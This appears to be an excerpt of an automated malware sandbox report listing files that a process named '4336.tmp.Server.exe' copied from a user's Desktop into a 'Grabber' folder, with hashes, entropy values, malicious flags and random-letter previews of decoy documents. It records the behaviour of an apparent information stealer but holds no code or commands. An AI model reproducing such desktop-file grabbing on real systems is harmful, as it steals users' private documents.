Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	true
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
